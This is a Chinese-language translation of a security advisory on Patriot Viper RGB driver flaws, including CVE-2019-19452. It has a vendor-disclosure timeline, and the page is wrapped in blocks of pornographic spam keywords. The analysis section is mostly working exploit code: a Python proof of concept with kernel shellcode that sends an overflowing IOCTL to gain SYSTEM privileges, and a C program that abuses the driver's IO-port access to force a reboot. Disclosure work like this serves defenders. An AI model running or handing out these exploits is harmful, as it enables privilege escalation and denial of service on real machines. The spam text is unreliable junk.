精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

對 Viper RGB 驅動多個緩沖區溢出漏洞的分析

安全 漏洞
在處理IoControlCode 0x80102040時,在Viper驅動程序RGB 1.1版中發現緩沖區溢出漏洞。

[[348655]]

0x01 漏洞信息

漏洞類型:基于堆棧的緩沖區溢出[ CWE-121 ],暴露的IOCTL(訪問控制不足)[ CWE-782 ] 影響:代碼執行允許特權提升 遠程可利用:否 本地可利用:是 CVE名稱:  CVE-2019-19452

0x02 漏洞描述

Patriot Memory是一家總部位于美國的技術公司,設計和制造內存模塊,閃存驅動器,移動配件和游戲設備。

在處理IoControlCode 0x80102040時,在Viper驅動程序RGB 1.1版中發現緩沖區溢出漏洞。本地攻擊者可以利用此漏洞,因此獲得NT AUTHORITY \ SYSTEM特權。

IOCTL代碼0x80102050和0x80102054允許具有低特權的用戶從IO端口讀取或向其寫入1/2/4字節。可以通過多種方式來利用它來最終以提升的特權運行代碼。

0x03  安全建議

1.1版和所有以前的版本在每個受支持的Windows版本中都容易受到攻擊(安裝程序:Patriot Viper RGB v1.1.exe)

解決方案和解決方法:

Patriot Memory已發布版本MSIO_191231_v1.2,該版本已修復報告中的漏洞。

這些漏洞是由Core Security Exploit團隊的Ricardo Narvaja和Lucas Dominikow發現的。

0x04  漏洞分析和利用驗證

基于堆棧的緩沖區溢出特權提升

CVE-2019-19452

對版本1.0的漏洞的利用驗證發現了溢出漏洞的存在,該溢出可以覆蓋ZwOpenSection和ZwMapViewOfSection的參數。

1.0版和1.1版之間的二進制代碼差異表明,盡管對這些函數的參數進行了檢查,但先前的溢出漏洞仍存在未進行修補,而CoreLabs在隨后研究中能夠控制其大小。

可以在下面找到有關版本1.0的信息:

https://github.com/active-labs/Advisories/blob/master/ACTIVE-2019-012.md

https://www.activecyber.us/activelabs/viper-rgb-driver-local-privilege-escalation-cve-2019-18845

在版本1.1中,控制器分析IoControlCodes并到達此位置,將IoControlCode與0x80102040進行比較。

  1. .text:0000000000001518 lea     rcx, aIrpMjDeviceCon ; "IRP_MJ_DEVICE_CONTROL" 
  2. .text:000000000000151F call    DbgPrint 
  3. .text:0000000000001524 mov     r11d, [rbp+18h] 
  4. .text:0000000000001528 cmp     r11d, 80102040h 
  5. .text:000000000000152F jz      loc_16D4 

如果比較結果正確,則會調用由CoreLabs控制的MaxCount(要復制的大小)和SRC(源緩沖區)的memmove,沒有進行驗證以確保數據適合目標緩沖區,從而導致堆棧溢出。

  1. .text:00000000000016E8 lea     rcx, [rsp+78h+Src] ; Dst 
  2. .text:00000000000016ED mov     r8, rbx         ; MaxCount 
  3. .text:00000000000016F0 mov     rdx, rsi        ; Src 
  4. .text:00000000000016F3 call    memmove 

由于驅動程序尚未使用安全cookie保護函數的堆棧,因此可以成功執行任意代碼。

可以通過調用CreateFileA來獲取驅動程序的句柄,然后通過發送受控數據來調用DeviceIoControl來實現此功能。下面將使用針對Windows 7 SP1 x64設計PoC,演示針對x64版本驅動程序的代碼執行。該代碼將需要改編為其他Windows版本。

有效利用漏洞取決于目標設備和體系結構的細節。例如,在Windows 10中,有SMEP / SMAP和其他特定的緩解措施。

下面看到的PoC漏洞利用演示了此過程,該過程重用了連接套接字以生成shell并在系統上執行任意命令。

  1. #!/usr/bin/env python 
  2. import struct, sys, os 
  3. from ctypes import * 
  4. from ctypes.wintypes import * 
  5. import os 
  6. import struct 
  7. import sys 
  8. from ctypes import wintypes 
  9.   
  10.   
  11. GENERIC_READ = 0x80000000 
  12. GENERIC_WRITE = 0x40000000 
  13. GENERIC_EXECUTE = 0x20000000 
  14. GENERIC_ALL = 0x10000000 
  15. FILE_SHARE_DELETE = 0x00000004 
  16. FILE_SHARE_READ = 0x00000001 
  17. FILE_SHARE_WRITE = 0x00000002 
  18. CREATE_NEW = 1 
  19. CREATE_ALWAYS = 2 
  20. OPEN_EXISTING = 3 
  21. OPEN_ALWAYS = 4 
  22. TRUNCATE_EXISTING = 5 
  23. HEAP_ZERO_MEMORY=0x00000008 
  24. MEM_COMMIT = 0x00001000 
  25. MEM_RESERVE = 0x00002000 
  26. PAGE_EXECUTE_READWRITE = 0x00000040 
  27.   
  28. ntdll = windll.ntdll 
  29. kernel32 = windll.kernel32 
  30.   
  31. ntdll.NtAllocateVirtualMemory.argtypes = [c_ulonglong, POINTER(c_ulonglong), c_ulonglong, POINTER(c_ulonglong),c_ulonglong,c_ulonglong] 
  32. kernel32.WriteProcessMemory.argtypes = [c_ulonglong, c_ulonglong, c_char_p,  c_ulonglong, POINTER(c_ulonglong)] 
  33.   
  34. GetProcAddress = kernel32.GetProcAddress 
  35. GetProcAddress.restype = c_ulonglong 
  36. GetProcAddress.argtypes = [c_ulonglong, wintypes.LPCSTR] 
  37.   
  38.   
  39. GetModuleHandleA = kernel32.GetModuleHandleA 
  40. GetModuleHandleA.restype = wintypes.HMODULE 
  41. GetModuleHandleA.argtypes = [wintypes.LPCSTR] 
  42.   
  43. k32Dll=GetModuleHandleA("kernel32.dll"
  44. print "0x%X"%(k32Dll) 
  45.   
  46. if (not k32Dll) : 
  47.     print ("[-] Failed To get module handle kernel32.dll\n"
  48.   
  49. WinExec=GetProcAddress(k32Dll, "WinExec"
  50.   
  51. print "0x%X"%(WinExec) 
  52.   
  53. if (not WinExec) : 
  54.     print ("[-] Failed To get WinExec address.dll\n"
  55.   
  56. print "WinExec = 0x%x"%WinExec 
  57.   
  58. raw_input() 
  59.   
  60.   
  61. buf = kernel32.VirtualAlloc(c_int(0x0),c_int(0x824),c_int(0x3000),c_int(0x40)) 
  62.   
  63. shellcode="\x90\x90\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4C\x8B\x42\x70\x4D\x8B\x88\x88\x01\x00\x00\x49\x8B\x09\x48\x8B\x51\xF8\x48\x83\xFA\x04\x74\x05\x48\x8B\x09\xEB\xF1\x48\\x8b\\x81\\x80\\x00\\x00\\x00\\x24\\xf0\\x49\\x89\\x80\\x08\\x02\\x00\\x00\\x48\\x31\\xc0\\x48\\x81\\xc4\\x28\\x01\\x00\x00\xc3"  
  64.   
  65. #STARTS HERE 
  66. written    = c_ulonglong(0) 
  67. dwReturn      = c_ulong() 
  68. hDevice = kernel32.CreateFileA(r"\\.\Msio",GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING, 0, None ) 
  69.   
  70.   
  71. print "[+] buffer address: 0x%X" % buf 
  72.   
  73. data= "\xeb\x4e" + 0x46  * "A" + struct.pack("<Q",int(buf)) + shellcode 
  74.   
  75. print "%r"%data 
  76.   
  77. kernel32.RtlMoveMemory(c_int(buf),data,c_int(len(data))) 
  78.   
  79. bytes_returned = wintypes.DWORD(0) 
  80. h=wintypes.HANDLE(hDevice) 
  81. b=wintypes.LPVOID(buf) 
  82.               
  83. #TRIGGER 
  84.   
  85. dev_ioctl = kernel32.DeviceIoControl(hDevice, 0x80102040, b, 80, None, 0,byref(dwReturn), None) 
  86.   
  87. os.system("calc.exe"
  88.   
  89. kernel32.CloseHandle(hDevice) 

用python 64位執行該代碼后,將顯示具有NT AUTHORITY \ SYSTEM特權的calc。

端口映射的I / O訪問

盡管當前沒有為該漏洞分配CVE,但是如果MITER分配了其他CVE名稱,則將使用其他信息更新本文檔。

我們可以使用IOCTL代碼0x80102050讀取IO端口。

要指定我們要讀取的IO端口以及要讀取的字節大小,必須發送一個精心制作的緩沖區,其中前兩個字節是IO端口,第六個是要讀取的字節數1、2或4。

此外,可以使用IOCTL代碼0x80102054對IO端口進行寫入。另外,必須發送一個精心制作的緩沖區。此緩沖區與讀取的緩沖區非常相似。主要區別在于我們還需要指定要發送到IO端口的數據。該數據可以為1/2/4字節,并從IO端口(3字節起)旁邊開始,在這種情況下,第六個字節將確定要寫入的字節數。

通過讀取/寫入IO端口我們可以實現利用。例如,以下PoC代碼將通過重新引導計算機來導致拒絕服。

  1. #include  
  2. #include  
  3.   
  4. #define IOCTL_READ_IOPORT 0x80102050  
  5. #define IOCTL_WRITE_IOPORT 0x80102054 
  6.   
  7.   
  8. HANDLE GetDriverHandle(LPCSTR driverName) 
  9.   
  10.     HANDLE hDriver = CreateFile(driverName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 
  11.   
  12.     if (hDriver == INVALID_HANDLE_VALUE) 
  13.     { 
  14.         printf("Failed GetDriverHandle.\nError code:%d\n", GetLastError()); 
  15.         exit(1); 
  16.     } 
  17.   
  18.   
  19.     return hDriver; 
  20.   
  21.   
  22.   
  23. BYTE ReadPort(HANDLE hDriver, unsigned int port) 
  24.     DWORD inBufferSize = 10; 
  25.     DWORD outBufferSize = 1; 
  26.   
  27.     DWORD bytesReturned = 0; 
  28.   
  29.     LPVOID inBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
  30.     LPVOID outBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
  31.   
  32.   
  33.     if (inBuffer == NULL
  34.     { 
  35.         printf("Failed to allocate inBuffer %d\n", GetLastError()); 
  36.         return 1; 
  37.     } 
  38.   
  39.     if (outBuffer == NULL
  40.     { 
  41.         printf("Failed to allocate outBuffer %d\n", GetLastError()); 
  42.         return 1; 
  43.     } 
  44.   
  45.   
  46.     memcpy((char*)inBuffer, &port, 2); 
  47.     memset((char*)inBuffer + 6, 0x1, 1); 
  48.       
  49.   
  50.     BOOL retDevIoControl = DeviceIoControl(hDriver, IOCTL_READ_IOPORT, inBuffer, inBufferSize, outBuffer, outBufferSize, &bytesReturned, 0); 
  51.   
  52.     if (retDevIoControl == 0) 
  53.     { 
  54.         printf("Failed DeviceIoControl\nError code:%d", GetLastError()); 
  55.         return 1; 
  56.     } 
  57.   
  58.     return (BYTE)(*((char*)outBuffer)); 
  59.   
  60. void WritePort(HANDLE hDriver, unsigned int port, BYTE data) 
  61.   
  62.     DWORD inBufferSize = 10; 
  63.     DWORD outBufferSize = 1; 
  64.   
  65.     DWORD bytesReturned = 0; 
  66.   
  67.     LPVOID inBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
  68.     LPVOID outBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
  69.   
  70.     if (inBuffer == NULL
  71.     { 
  72.         printf("Failed to allocate inBuffer %d\n", GetLastError()); 
  73.         exit(1); 
  74.     } 
  75.   
  76.     if (outBuffer == NULL
  77.     { 
  78.         printf("Failed to allocate outBuffer %d\n", GetLastError()); 
  79.         exit(1); 
  80.     } 
  81.   
  82.   
  83.   
  84.     memcpy((char*)inBuffer, &port, 2); 
  85.     memcpy((char*)inBuffer + 2, &data, 1); 
  86.     memset((char*)inBuffer + 6, 0x1, 1);  
  87.   
  88.   
  89.   
  90.     BOOL retDevIoControl = DeviceIoControl(hDriver, IOCTL_WRITE_IOPORT, inBuffer, inBufferSize, outBuffer, outBufferSize, &bytesReturned, 0); 
  91.   
  92.     if (retDevIoControl == 0) 
  93.     { 
  94.         printf("Failed DeviceIoControl\nError code:%d", GetLastError()); 
  95.         exit(1); 
  96.     } 
  97.   
  98.   
  99.   
  100. int main(int argc, char** argv) 
  101.     LPCSTR driverName = (LPCSTR)"\\\\.\\Msio"
  102.   
  103.   
  104.     HANDLE hDriver = GetDriverHandle(driverName); 
  105.   
  106.     BYTE portCF9 = ReadPort(hDriver, 0xcf9) & ~0x6; 
  107.       
  108.     WritePort(hDriver, 0xcf9, portCF9 | 2); 
  109.       
  110.     Sleep(50); 
  111.       
  112.     WritePort(hDriver, 0xcf9, portCF9 | 0xe); // Cold Reboot 
  113.       
  114.   
  115.     CloseHandle(hDriver); 
  116.   
  117.   
  118.     return 0; 

0x05 漏洞披露時間表

2019年11月6日– CoreLabs通過support@patriotmem.com向供應商發出了聯系電子郵件,  要求披露。

2019年11月26日–通過MITER網站申請CVE,收到申請確認。

2019年11月29日– MITER將CVE-2019-19452分配給第一個漏洞。

2019年12月5日–稱為Patriot Memory HQ(510-979-1021),已通過自動電話系統轉發給技術支持,還留下了留言信息和電子郵件。

2019年12月5日–收到來自賣方的電子郵件,要求進一步的信息。回復了非常基本的描述,并要求在發送POC之前確認此電子郵件是公司的首選公開方法。

2019年12月17日–收到來自供應商Patriot R&D的電子郵件,其中確認了提交方式并將其命名為主要聯系人,回復了PoC。

2020年1月1日–收到來自供應商的電子郵件,其中附有建議的修復程序。

2020年1月8日–確認補丁程序正確。與供應商確認補丁程序有效,并詢問他們何時發布補丁程序。

2020年1月9日–供應商聲明該補丁最多需要兩周才能發布(2020年1月23日)。

2020年1月16日–通過電子郵件發送給供應商,以確認23日的一切按計劃進行。說明我們打算在24日發布。

2020年1月16日–發現第二個未通過補丁解決的漏洞。新的POC發送給愛國者。

2020年1月20日–收到來自供應商的電子郵件,指出他認為發現第二個漏洞可能會延遲發布有問題的補丁。

2020年2月7日– Tweet由第三方發布在Twitter上,其中包含有關Viper RGB漏洞的信息。CoreLabs驗證了推文中的信息是否正確,數據現在處于公開狀態。

2020年2月8日–向MITRE請求第二個漏洞的CVE身份。

2020年2月8日–向Patriot請求第二個漏洞的補丁程序狀態,并告知他們該信息現已在Twitter上公開。

2020年2月10日–Patriot回應說,第二個漏洞目前沒有補丁。

2020年2月12日–告知Patriot,隨著有關漏洞的信息公開,CoreLabs計劃在2020年2月17日發布,除非在2020年2月14日之前收到進一步的溝通。

2020年2月17日–已發布咨詢CORE-2020-0001。

參考信息:

https://www.viper.patriotmemory.com/viperrgbdramsoftware

https://www.coresecurity.com/contact

本文翻譯自:​https://www.coresecurity.com/advisories/viper-rgb-driver-multiple-vulnerabilities?source=twitter&code=CMP-0000001929&ls=100000000&utm_campaign=core-cts-emails&utm_content=117968468&utm_medium=social&utm_source=twitter&hss_channel=tw-17157238如若轉載,請注明原文地址。

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2020-08-10 08:37:32

漏洞安全數據

2018-11-01 08:31:05

2011-11-15 16:00:42

2022-08-09 08:31:40

C -gets函數漏洞

2015-09-02 09:01:03

2017-01-09 17:03:34

2019-02-27 13:58:29

漏洞緩沖區溢出系統安全

2017-08-30 20:49:15

2014-07-30 11:21:46

2009-09-24 18:16:40

2018-01-26 14:52:43

2010-09-29 15:59:04

2010-12-27 10:21:21

2011-02-24 09:21:31

2010-10-09 14:45:48

2015-03-06 17:09:10

2011-03-23 12:39:44

2010-09-08 15:43:18

2021-01-27 18:03:52

漏洞網絡安全網絡攻擊

2011-07-20 10:54:14

C++
點贊
收藏

51CTO技術棧公眾號

一区二区免费在线播放| av动漫免费看| 亚洲精品在线网址| 天堂网在线中文| 99久久九九| 91丨porny丨在线| 九九热视频这里只有精品| 啊啊啊国产视频| 可以在线观看的av| 福利欧美精品在线| 亚洲欧美在线视频观看| 国产精品扒开腿做爽爽爽视频| 亚洲最大视频网| 国产原创在线观看| 久久av中文字幕片| 中文字幕亚洲无线码a| 精品99在线视频| 黄色在线免费看| 26uuu精品一区二区三区四区在线| 国产精品视频专区| 影音先锋男人看片资源| 成人在线免费| 国产精品国产自产拍高清av王其| 国产精品美女久久久久久免费 | 久久草.com| 国产成年人免费视频| **爰片久久毛片| 一区二区三区四区视频精品免费 | 欧美激情三级| 一区二区三区在线观看网站| 欧美高清视频一区二区三区在线观看 | 一区二区三区免费网站| 欧美福利小视频| 加勒比av中文字幕| se在线电影| 另类的小说在线视频另类成人小视频在线| 国产香蕉97碰碰久久人人| 欧美 日韩精品| 久久香蕉av| aaa亚洲精品| 日本久久久久久久| 波多野结衣一二三四区| 综合久久av| 亚洲高清一区二区三区| 久久大片网站| 精品人妻一区二区三区浪潮在线| 国模 一区 二区 三区| 欧美本精品男人aⅴ天堂| 精品无码国产一区二区三区av| 蜜桃av噜噜一区二区三区麻豆| 国产乱码精品一区二区三区四区 | 国产又粗又猛又爽又| 91麻豆国产自产在线观看亚洲 | 韩国成人在线视频| 在线电影中文日韩| 一级黄色大片儿| 国产国产一区| 欧美伦理视频网站| www.av片| av片在线免费观看| 国产高清成人在线| 欧美亚洲免费电影| 战狼4完整免费观看在线播放版| 日本免费一区二区视频| 欧美三级欧美成人高清www| 亚洲精品不卡| 黑人精品一区二区| av在线一区二区| 鲁丝片一区二区三区| 国产又爽又黄免费软件| 一级成人国产| 伦伦影院午夜日韩欧美限制| 内射中出日韩无国产剧情| 超碰国产精品一区二页| 亚洲影院在线观看| 日本一区二区视频| 亚洲毛片在线播放| 99视频国产精品| 欧美一区激情视频在线观看| av电影在线观看| 亚洲精品中文在线观看| 区一区二区三区中文字幕| 国内在线精品| aaa国产一区| 欧美精品成人一区二区在线观看| 国产69久久| 91一区一区三区| 1卡2卡3卡精品视频| 日韩三级一区二区| 99视频一区| 国产精品高潮呻吟久久av野狼| 中文字幕乱码在线观看| 香蕉久久久久久久av网站| 欧美日本黄视频| 国产成人愉拍精品久久| 亚洲小说欧美另类婷婷| 久久久www成人免费精品| 国产一区二区三区四区五区六区| www.国产精品一区| 日韩欧美中文一区二区| 色悠悠久久综合网| 欧美日韩精品免费观看视欧美高清免费大片| 一区二区三区四区高清精品免费观看| 成年人看的毛片| 国产激情久久| 亚洲精品乱码久久久久久金桔影视| 999热精品视频| 欧美黄色网视频| 亚洲国产精品国自产拍av秋霞| 男男受被啪到高潮自述| 亚洲日本中文| 日韩经典第一页| 成人涩涩小片视频日本| 午夜免费一区| 久久五月天色综合| 特级西西444www大精品视频免费看| 欧美日韩99| 久久久久久国产三级电影| 欧美日韩免费做爰视频| 中文字幕亚洲综合久久五月天色无吗''| 日韩在线视频线视频免费网站| 国产精品久久免费观看| 激情综合在线| 91久久久久久久久久久| 国产ts人妖调教重口男| 国产精品12区| 亚洲欧洲一区二区福利| 在线日韩影院| 欧美色精品在线视频| 日本中文字幕二区| 欧美在线在线| 久久精品青青大伊人av| 亚洲午夜无码久久久久| 精品夜夜嗨av一区二区三区| 日本高清不卡一区二区三| 超碰中文在线| 色噜噜偷拍精品综合在线| 亚洲激情在线观看视频| 日韩理论电影中文字幕| 中文国产成人精品久久一| 国产情侣自拍av| 奇米在线7777在线精品| 91手机视频在线观看| avtt在线播放| 欧美日韩精品一区二区| 一区二区三区四区影院| 网友自拍区视频精品| 久久久噜噜噜久久| 久久久成人免费视频| 免费观看在线综合| 国产精品一区视频网站| 高清av在线| 在线视频欧美精品| 久久久久无码国产精品一区李宗瑞| 99久久夜色精品国产亚洲狼| 国产欧美精品日韩| 黄色免费在线看| 日韩欧美的一区二区| 中文字字幕码一二三区| 99久久亚洲精品| 亚洲iv一区二区三区| 四虎精品成人影院观看地址| 中文字幕一区二区三区不卡在线| 一区二区三区 日韩| 日韩免费特黄一二三区| 久久全国免费视频| 亚洲人成色777777老人头| 中文字幕在线不卡国产视频| 三级av免费观看| 美腿丝袜亚洲图片| 精品国内自产拍在线观看| 91尤物国产福利在线观看| heyzo一本久久综合| 日韩欧美一区二| 又骚又黄的视频| **爰片久久毛片| 欧美大肥婆大肥bbbbb| 无码人妻av免费一区二区三区 | 久久影院午夜精品| 91精品国产91久久综合桃花| 亚洲 欧美 日韩在线| 欧美男gay| 国模叶桐国产精品一区| 亚洲av成人精品毛片| 在线观看日韩高清av| 黄色香蕉视频在线观看| 成人黄色av网站在线| 国产系列第一页| 你懂得影院夜精品a| 亚洲第一区第二区| 欧美h视频在线观看| 三妻四妾完整版在线观看电视剧| 国产一区二区三区在线免费观看| 一本色道久久综合亚洲| 亚洲妇熟xx妇色黄| 91狠狠综合久久久久久| 国产精品一区2区| 视频一区三区| 免费观看成人性生生活片| www.亚洲免费视频| 中文字幕在线日亚洲9| 一区二区三区在线高清| 天天插天天射天天干| 久久av老司机精品网站导航| www.射射射| 99国内精品久久久久久久| 精品无人区一区二区三区竹菊| 色婷婷av在线| 国产女18毛片多18精品| 精品一区二区三区在线视频| 99久久免费观看| 日韩精品一区二区三区免费视频| 668精品在线视频| 天天干天天舔天天射| 欧美视频一区二区三区四区 | 久久福利视频网| 欧美美乳在线| 精品日韩欧美一区二区| 中文字幕视频免费观看| 大伊人狠狠躁夜夜躁av一区| 国产精品九九视频| 国产在线不卡视频| 久久综合久久久久| 日韩精品一区二区三区免费观影| 欧美激情国产高清| 日韩久久久久久久久久久| 亚洲三级网页| 国产精品国产自产拍高清av水多| 综合久久2019| 日韩电视剧在线观看免费网站| 一区二区三区免费在线| 色婷婷综合五月| 久久精品亚洲a| 国产很黄免费观看久久| 久久国产精品国产精品| 日韩在线播放一区二区| 亚洲一二区在线| 日韩精品三级| 91精品久久久久久久久| 日本性爱视频在线观看| 久久久精品视频成人| 日本中文字幕视频在线| 日韩一区二区三区av| 国产精品美女一区| 欧美三日本三级三级在线播放| 精品人妻一区二区色欲产成人| 在线亚洲激情| 欧美黑人xxx| 美女写真理伦片在线看| 欧美一级二级三级蜜桃| 一级片在线观看视频| 在线观看不卡一区| 伊人亚洲综合网| 欧美日韩精品高清| 国产又粗又猛又爽| 欧美高清视频一二三区 | 精品无码一区二区三区蜜臀| 国产精品乱人伦中文| 中文字幕第六页| 国产a视频精品免费观看| 亚洲爆乳无码专区| 在线中文一区| 穿情趣内衣被c到高潮视频| 欧美一级全黄| 亚洲欧美在线另类| 日本一卡二卡在线| 91免费国产视频网站| 黄色aaa视频| 国产精品一区二区无线| 亚洲a级黄色片| 国产精品一区二区视频| 在线中文字日产幕| 99久久婷婷国产综合精品电影 | 精品国内自产拍在线观看视频 | 国产玖玖精品视频| 老司机亚洲精品一区二区| 国产精品swag| 国产精品一区二区美女视频免费看| 91超碰在线电影| 欧美亚洲大陆| 偷拍盗摄高潮叫床对白清晰| 欧美日韩国产色综合一二三四| 一区二区传媒有限公司| 麻豆成人免费电影| 国产xxxx视频| 93在线视频精品免费观看| 欧美xxxx18性欧美| 国产探花在线观看| 国产精品国模在线| 91成人短视频| 天堂√在线观看一区二区| 欧美一区二区三区免费看| 亚洲草草视频| 欧美欧美全黄| 精品999在线| 成人av免费在线观看| 妖精视频在线观看免费| 亚洲一区二区四区蜜桃| 中文字幕手机在线视频| 日韩视频一区二区在线观看| 精品福利视频导航大全| 久久99久久亚洲国产| 欧美影视资讯| 国产欧美丝袜| 日本一区福利在线| 一区二区三区四区在线视频| 欧洲毛片在线视频免费观看| 午夜电影一区二区| 精品无码国产污污污免费网站 | 亚洲国产私拍精品国模在线观看| 国产欧美久久久| 亚洲欧美日韩视频一区| 九色在线观看视频| 九九热99久久久国产盗摄| 嫩草伊人久久精品少妇av杨幂| 国产伦精品一区二区三区视频免费| 成人3d动漫在线观看| 日本一区二区三不卡| 亚洲欧洲日本mm| 国产xxxxx在线观看| 国产精品综合二区| 999久久久国产| 日本黄色一区二区| 青青青草原在线| 国产亚洲美女精品久久久| 91探花在线观看| 国产激情综合五月久久| 四虎影视国产精品| 99re视频在线| 视频福利一区| 日韩精品一区二区在线视频| 精品在线播放免费| 成人性生交大片免费看无遮挡aⅴ| 欧美午夜电影在线| 无码国产精品一区二区色情男同 | 亚洲不卡一卡2卡三卡4卡5卡精品| 国语精品一区| 佐佐木明希电影| 亚洲精品国产视频| 国产超碰人人模人人爽人人添| 久久精品91久久久久久再现| 国产成人精品一区二区三区免费| 日本日本精品二区免费| 久久综合影视| 手机在线国产视频| 国产精品第五页| 97av免费视频| 久久久91精品国产| 精品国产亚洲一区二区三区大结局| 在线看视频不卡| 国产综合色在线| 国产一区二区视频在线观看免费| 欧美日韩国产综合新一区 | 久久久久久久久一| 中文字幕第二区| 欧美日韩三级一区二区| 99青草视频在线播放视| 国产日韩中文字幕| 亚洲久久久久| 久久性爱视频网站| 中文字幕在线不卡视频| 国产麻豆免费观看| 欧美丰满片xxx777| 嫩草国产精品入口| 国产成人精品视频ⅴa片软件竹菊| 国产伦精品一区二区三区免费| 免费中文字幕日韩| 精品日韩在线观看| 在线观看欧美日韩电影| 相泽南亚洲一区二区在线播放| 久久99九九99精品| 国产亚洲精品久久久久久无几年桃| 在线中文字幕不卡| 欧美jizz18性欧美| 高清不卡日本v二区在线| 一本色道久久综合| 黄色三级生活片| 精品少妇一区二区三区在线视频| av资源新版天堂在线| 日韩av一区二区三区美女毛片| 欧美大片专区| 强迫凌虐淫辱の牝奴在线观看| 色欧美片视频在线观看| 免费黄色在线网站| 国产亚洲第一区| 美女一区二区视频| 久久亚洲AV无码| 揄拍成人国产精品视频| 99香蕉久久| 国产又黄又猛又粗又爽的视频| 亚洲自拍另类综合| 国产高清免费av在线| a级国产乱理论片在线观看99| 亚洲欧美网站| 中文字幕在线有码| 伊人一区二区三区久久精品| 凹凸av导航大全精品| 亚洲77777| 福利视频一区二区| 91精品久久|